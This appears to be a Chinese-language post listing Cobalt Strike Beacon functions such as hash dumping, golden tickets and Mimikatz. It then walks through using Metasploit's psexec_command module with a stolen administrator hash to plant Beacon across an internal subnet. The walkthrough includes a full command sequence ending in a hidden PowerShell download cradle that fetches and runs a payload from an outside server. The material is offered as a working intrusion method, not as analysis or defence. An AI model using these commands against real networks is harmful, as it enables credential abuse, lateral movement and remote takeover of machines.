AccessDump Hashes #获取hashElevate #提权Golden Ticket #生成黄金票据注入当前会话Make token #凭证转换Run Mimikatz #运行 Mimikatz Spawn As #用其他用户生成Cobalt Strike侦听器ExploreBrowser Pivot #劫持目标浏览器进程Desktop(VNC) #桌面交互File Browser #文件浏览器Net View #命令Net ViewPort Scan #端口扫描Process List #进程列表Screenshot #截图利用MSF模块上线Beacon shell当通过其它方式拿到了目标内网中某台Windows机器的本地管理员明文密码或hash时,可利用Metasploit下
auxiliary/admin/smb/psexec_command模块,直接上线指定目标机器的Beacon shell 。(前提目标即可出网)
先利用CobalStrike生成上线Beacon的powershell 。

文章插图
本地启动Metasploit,挂上代理,设置psexec_command模块参数 。
msf5 > setg Proxies socks4/5:ip:portmsf5 > use auxiliary/admin/smb/psexec_commandmsf5 > set rhosts 192.168.144.0/24msf5 > set threads 10msf5 > set smbuser administratormsf5 > set smbpass aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4 #明文、密文均可msf5 > set command powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://149.28.xx.xx:80/a'))" #上线CS的powershell,目标机存在杀软需考虑msf5 > run
文章插图
推荐阅读
- Web渗透流程、Windows基础、注册表及黑客常用DOS命令
- phpmyadmin渗透思路整理
- 内网渗透测试——端口转发与内网代理渗透测试实验报告
- Web漏洞扫描神器Nikto使用指南
- 华为防火墙配置端口映射,并且在内网也能用外网的IP和端口访问
- 这4种“药丸”是养花“神器”,生根快,不板结,花骨朵挂满枝头
- 无需安装,仅需 1 条指令,秒实现内网穿透的神器 Serveo
- 社会工程学 渗透攻击实例-邪恶的CSRF
- 梦幻西游|梦幻西游:玩家熟练度不足500,打30级项链炸神器,叫价2亿起!
- 新手学习电脑渗透的基础知识掌握
